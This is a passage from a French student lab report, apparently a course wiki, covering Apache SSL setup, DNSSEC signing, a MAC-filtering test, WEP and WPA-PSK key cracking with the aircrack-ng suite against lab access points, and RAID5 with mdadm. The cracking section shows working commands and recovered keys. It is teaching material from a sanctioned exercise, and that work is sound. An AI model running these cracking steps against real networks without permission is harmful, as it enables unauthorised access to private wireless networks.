root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 qui représente le RAID5 de partitions&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mkfs /dev/md0&lt;br /&gt;
mkdir /datamd0&lt;br /&gt;
mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon oct 13 11:45:01 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour rajouter la partition, on la decommente dans le fichier de configuration et on procede au rajout de cette partition au raid de la facon suivante:&lt;br /&gt;
&lt;br /&gt;
 mdadm --add /dev/md0 /dev/xvde&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
